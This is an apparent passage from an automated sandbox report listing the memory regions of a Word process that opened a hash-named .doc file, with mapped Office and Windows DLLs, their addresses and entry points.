start_va = 0x6a700000 end_va = 0x6a817fff monitored = 0 entry_point = 0x6a7040b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 406 start_va = 0x6a820000 end_va = 0x6a863fff monitored = 0 entry_point = 0x6a83aaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 407 start_va = 0x6a870000 end_va = 0x6a87efff monitored = 0 entry_point = 0x6a872a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 408 start_va = 0x6a880000 end_va = 0x6ac08fff monitored = 0 entry_point = 0x6a91cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 409 start_va = 0x6ac10000 end_va = 0x6b9c1fff monitored = 0 entry_point = 0x6ac11000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 410 start_va = 0x6b9d0000 end_va = 0x6b9ecfff monitored = 0 entry_point = 0x6b9d7240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 411 start_va = 0x6b9f0000 end_va = 0x6ba0ffff monitored = 0 entry_point = 0x6ba02810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 412 start_va = 0x6ba10000 end_va = 0x6ba15fff monitored = 0 entry_point = 0x6ba11490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 413 start_va = 0x6ba20000 end_va = 0x6bfb7fff monitored = 0 entry_point = 0x6ba21000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 414 start_va = 0x6bfc0000 end_va = 0x6c6d4fff monitored = 0 entry_point = 0x6bfc1000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 415 start_va = 0x6c6e0000 end_va = 0x6c9e1fff monitored = 0 entry_point = 0x6c6e1000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 416 start_va = 0x6c9f0000 end_va = 0x6cbc4fff monitored = 0 entry_point = 0x6c9f1000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 417 start_va = 0x6cbd0000 end_va = 0x6d7c1fff monitored = 0 entry_point = 0x6cbd1000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\oart.dll") Region: id = 418 start_va = 0x6d7d0000 end_va = 0x6d83ffff monitored = 0 entry_point = 0x6d80ec20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\SysWOW64\\msvcp140.dll" (normalized: "c:\\windows\\syswow64\\msvcp140.dll") Region: id = 419 start_va = 0x6d840000 end_va = 0x6d9aafff monitored = 0 entry_point = 0x6d8ae360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 420 start_va = 0x6d9b0000 end_va = 0x6f611fff monitored = 0 entry_point = 0x6d9b1000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wwlib.dll") Region: id = 421 start_va = 0x6f620000 end_va = 0x6f700fff monitored = 0 entry_point = 0x6f64e6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 422 start_va = 0x6f710000 end_va = 0x6f723fff monitored = 0 entry_point = 0x6f71e290 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 423 start_va = 0x6f730000 end_va = 0x6f75cfff monitored = 0 entry_point = 0x6f742b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 424 start_va = 0x6f8c0000 end_va = 0x6fa32fff monitored = 0 entry_point = 0x6f96d220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 425 start_va = 0x6fc60000 end_va = 0x6fdaafff monitored = 0 entry_point = 0x6fcc1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 426 start_va = 0x6fdb0000 end_va = 0x6fde2fff monitored = 0 entry_point = 0x6fdc0e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 427 start_va = 0x6fdf0000 end_va = 0x6fdf9fff monitored = 0 entry_point = 0x6fdf3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 428 start_va = 0x6ff10000 end_va = 0x70127fff monitored = 0 entry_point = 0x6ffb97b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 429 start_va = 0x70660000 end_va = 0x7072cfff monitored = 0 entry_point = 0x706b29c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 430 start_va = 0x70730000 end_va = 0x707d6fff monitored = 0 entry_point = 0x70766240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 431 start_va = 0x707e0000 end_va = 0x709f9fff monitored = 0 entry_point = 0x70875550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 432 start_va = 0x70ae0000 end_va = 0x70b62fff monitored = 0 entry_point = 0x70b037c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 433 start_va = 0x70b70000 end_va = 0x70d60fff monitored = 0 entry_point = 0x70c53cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 434 start_va = 0x70d70000 end_va = 0x711fdfff monitored = 0 entry_point = 0x710fa320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 435 start_va = 0x713a0000 end_va = 0x713bcfff monitored = 0 entry_point = 0x713a3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 436 start_va = 0x71560000 end_va = 0x7157afff monitored = 0 entry_point = 0x71569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 437 start_va = 0x72cb0000 end_va = 0x72d24fff monitored = 0 entry_point = 0x72ce9a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 438 start_va = 0x72dd0000 end_va = 0x72fdefff monitored = 0 entry_point = 0x72e7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 439 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 440 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 441 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 442 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 443 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 444 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 445 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 446 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 447 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 448 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 449 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 450 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 451 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 452 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 453 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 454 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 455 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 456 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 457 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 458 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 459 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 460 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 461 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 462 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 463 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 464 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 465 start_va = 0x77170000 end_va = 0x771c9fff monitored = 0 entry_point = 0x77197e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 466 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 467 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 468 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 469 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 470 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 471 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 472 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 473 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 474 start_va = 0x717a0000 end_va = 0x7191dfff monitored = 0 entry_point = 0x7181c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 475 start_va = 0x73b80000 end_va = 0x73e4afff monitored = 0 entry_point = 0x73dbc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 476 start_va = 0x8f0000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 477 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 478 start_va = 0xf760000 end_va = 0xfbc2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc3247f04148bbb78a86c8ed530b777doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc3247f04148bbb78a86c8ed530b777doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc3247f04148bbb78a86c8ed530b777doc") Region: id = 479 start_va = 0x69650000 end_va = 0x69659fff monitored = 0 entry_point = 0x69652a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 480 start_va = 0x69650000 end_va = 0x69659fff monitored = 0 entry_point = 0x69652a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 481 start_va = 0x69650000 end_va = 0x6965bfff monitored = 0 entry_point = 0x696528fd region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 482 start_va = 0x69630000 end_va = 0x6964ffff monitored = 0 entry_point = 0x6963c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 483 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 484 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 485 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 486 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 487 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 488 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 489 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 490 start_va = 0xf760000 end_va = 0xfbc2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc") Region: id = 491 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 492 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 493 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 494 start_va = 0xce70000 end_va = 0xd0a1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc") Region: id = 495 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 496 start_va = 0xf760000 end_va = 0xfbc2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc") Region: id = 497 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 498 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 499 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 500 start_va = 0xf760000 end_va = 0xfbc2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc") Region: id = 501 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 502 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 503 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 504 start_va = 0xce70000 end_va = 0xd0a1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc") Region: id = 505 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 506 start_va = 0xf760000 end_va = 0xfbc2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777.doc") Region: id = 507 start_va = 0xf360000 end_va = 0xf75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f360000" filename = "" Region: id = 508 start_va = 0xf360000 end_va = 0xfb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f360000" filename = "" Region: id = 509 start_va = 0xfb60000 end_va = 0xff2bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 510 start_va = 0xff30000 end_va = 0x102fcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ff30000" filename = "" Region: id = 511 start_va = 0xce70000 end_va = 0xd05cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce70000" filename = "" Region: id = 512 start_va = 0xfb60000 end_va = 0xfd4dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fb60000" filename = "" Region: id = 513 start_va = 0xfb60000 end_va = 0xff33fff monitored = 1 entry_point = 0x0 